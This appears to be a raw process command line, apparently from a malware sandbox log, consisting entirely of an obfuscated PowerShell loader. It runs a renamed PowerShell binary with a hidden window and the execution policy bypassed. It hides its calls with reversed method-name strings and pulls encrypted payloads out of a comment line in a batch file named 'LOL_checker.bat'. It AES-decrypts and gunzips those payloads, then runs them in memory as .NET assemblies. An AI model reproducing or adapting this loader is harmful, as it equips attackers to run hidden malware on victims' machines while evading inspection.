"LOL_checker.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DQmdf($GcQSI){ $MLWPM=[System.Security.Cryptography.Aes]::Create(); $MLWPM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MLWPM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MLWPM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnElpKi3YXgWFDU7pRsJ29FkGHhv7uNvwUu22mGWA88='); $MLWPM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AiYws6YSgygGmwuUkwYnTg=='); $vdfPb=$MLWPM.CreateDecryptor(); $return_var=$vdfPb.TransformFinalBlock($GcQSI, 0, $GcQSI.Length); $vdfPb.Dispose(); $MLWPM.Dispose(); $return_var;}function Jxcvo($GcQSI){ $ZkRsx=New-Object System.IO.MemoryStream(,$GcQSI); $isvCW=New-Object System.IO.MemoryStream; $xcnTt=New-Object System.IO.Compression.GZipStream($ZkRsx, [IO.Compression.CompressionMode]::Decompress); $xcnTt.CopyTo($isvCW); $xcnTt.Dispose(); $ZkRsx.Dispose(); $isvCW.Dispose(); $isvCW.ToArray();}function WwkcJ($GcQSI,$gLxyw){ $xyGVN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$GcQSI); $rMLKn=$xyGVN.EntryPoint; $rMLKn.Invoke($null, $gLxyw);}$rZFEd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat').Split([Environment]::NewLine);foreach ($crFGN in $rZFEd) { if ($crFGN.StartsWith(':: ')) { $kQmAw=$crFGN.Substring(3); break; }}$nzheQ=[string[]]$kQmAw.Split('\');$fCDTP=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[0])));$MFOxB=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[1])));WwkcJ $MFOxB (,[string[]] (''));WwkcJ $fCDTP (,[string[]] (''));